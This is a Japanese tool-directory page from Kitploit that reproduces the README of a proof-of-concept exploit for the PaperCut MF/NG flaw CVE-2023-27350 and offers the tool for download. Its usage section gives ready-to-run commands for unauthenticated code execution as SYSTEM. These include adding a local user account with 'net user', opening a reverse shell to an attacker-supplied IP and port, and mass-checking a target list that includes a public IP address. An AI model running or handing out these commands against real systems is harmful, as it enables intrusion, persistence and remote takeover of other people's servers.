Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27350 — Papercut CVE-2023-27350 のエクスプロイト。 [+] リバースシェル [+] 一括チェック | Kitploit
ツール/GitHubGitHub/adhikara13/cve-2023-27350
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールペイロード開発
GitHubadhikara13/cve-2023-27350

CVE-2023-27350

Papercut CVE-2023-27350 のエクスプロイト。 [+] リバースシェル [+] 一括チェック

リポジトリを見る
9333年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27350 エクスプロイト PoC

これは、PaperCut MF/NG に見つかった脆弱性 CVE-2023-27350 の Proof of Concept (PoC) エクスプロイトです。この脆弱性により、認証されていない攻撃者が SYSTEM 権限で任意のコードを実行できます。

要件

このエクスプロイトを使用する前に、以下のライブラリがインストールされていることを確認してください。

pip install -r requirements.txt

使用方法

python CVE-2023-27350.py -u <target url> [-c <command> | --reverse-shell | -f <file>]

オプション

  • -u, --url: ターゲット PaperCut MF/NG アプリケーションの URL(例: http://target-ip:9191)。
  • -c, --command: ターゲットシステム上で実行するコマンド。
  • --reverse-shell: リバースシェルペイロードを使用して、ターゲットシステム上でコマンドを実行します。
  • -f, --file: ファイルから複数のターゲットをチェックします(例: file.txt)。

例

コマンド実行

ターゲットシステム上でコマンドを実行するには、-c オプションを使用します:

python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"

リバースシェル

リバースシェルペイロードを使用してターゲットシステム上でコマンドを実行するには、--reverse-shell オプションを使用します。IP アドレスとポート番号の入力を求められます:

python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>

一括チェック

ファイルから複数のターゲットをチェックするには、-f オプションを使用します。ファイルの形式は ip_address:port である必要があります:

python CVE-2023-27350.py -f file.txt

file.txt のフォーマット

file.txt 入力でマスチェックオプションを使用する場合、ファイルの内容が正しくフォーマットされていることを確認してください。

ファイルの各行には、ターゲットの IP アドレスとポート番号をコロン : で区切って含める必要があります。例:

110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080

IP アドレス、コロン、ポート番号の間に余分なスペースや文字がないことを確認してください。また、各行に IP アドレスとポート番号が 1 つだけ含まれていることを確認してください。

クレジット

これは horizon3ai/CVE-2023-27350 リポジトリのフォークバージョンです。元のエクスプロイトのすべてのクレジットは作者に帰属します。

ツールをダウンロード